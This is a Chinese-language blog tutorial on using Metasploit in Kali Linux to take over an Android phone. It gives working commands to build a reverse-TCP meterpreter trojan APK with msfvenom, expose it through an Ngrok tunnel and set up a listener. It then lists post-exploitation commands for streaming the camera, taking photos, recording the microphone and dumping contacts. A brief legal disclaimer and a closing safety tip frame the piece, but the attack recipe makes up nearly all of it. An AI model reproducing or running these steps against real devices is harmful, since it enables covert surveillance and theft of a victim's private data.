一. 前言:
嚴正聲明:本文僅限於技術討論與分享,嚴禁用於非法途徑。
實驗目的:演示如何使用Kali里的Metasploit控制安卓手機
內網穿透原理:內網穿透相當於先將數據發給服務器,然后由服務器發給內網中的我們
二. 環境准備
注:具體下載和使用方法我就不講了,百度上都有,講起來太長了
1.kali linux(攻擊方)
2.Ngrok(小米球)
下載linux版本並注冊一個帳號來開通一個免費的隧道,用於接下來的端口映射
3.安卓模擬器(因為博主沒有安卓手機,所以用模擬器)
注:比較推薦用模擬器,因為這個漏洞挺久遠的,所以不支持高版本的手機,目前我測試了7.0以上好像是不行的(至少我沒成功,有成功的歡迎來教教我),靶機我用的是版本為5.1的安卓
三. 開始實驗
1. 啟動內網穿透工具Ngrok
命令: ./xiaomiqiu_start.sh(在xiaomiqiu文件右擊在此打開終端並輸入此命令)
2.查看kali的ip
命令:ifconfig
3. 用Metasploit生成載有惡意Payload的Android的apk
命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.121.128 lport=8080 R > what.apk
解釋: lhost=192.168.121.128 (這是Kali的IP)lport=8080 (默認4444,可以自定義,這里要與Ngrok的相同)
4. 啟動msfconsole,設置模塊
命令1:msfconsole
命令2:use exploit/multi/handler
5. 設置payload和監聽
set payload android/meterpreter/reverse_tcp //選擇Payload
set lhost 192.168.121.128 //這里的地址設置成我們剛才生成木馬的IP地址
set lport 8080 //這里的端口設置成剛才我們生成木馬所監聽的端口
6. 檢查配置是否正確
命令:options
四.攻擊
1. 入侵
命令:exploit或者run
這個時候就監聽就開啟了,然后使用手機安裝剛才生成的病毒文件(拉文件就不用演示了吧)
2. 此時手動點擊剛才手機中安裝的MainActivity
程序圖標(沒有界面)
3.當受害者點擊以后便可成功建立攻擊會話
五. 攻擊命令
1.開啟攝像頭並錄像
命令:webcam_stream
2.查看手機系統信息
命令:sysinfo
3.導出手機通訊錄
命令:dump_contacts
4.調用攝像頭拍照
命令:webcam_snap
5.錄制聲音
命令: record_mic
6.成功建立攻擊會話后可以對受害者手機進行像Linux主機shell一樣對手機進行命令執行操作
至此,本次演示結束,其他一些命令我就不一一演示了,有興趣的話可自行借助help命令或者?給出的使用命令描述進行體驗。
溫馨提示:請不要隨便安裝陌生人的軟件,可能會泄露自己的隱私!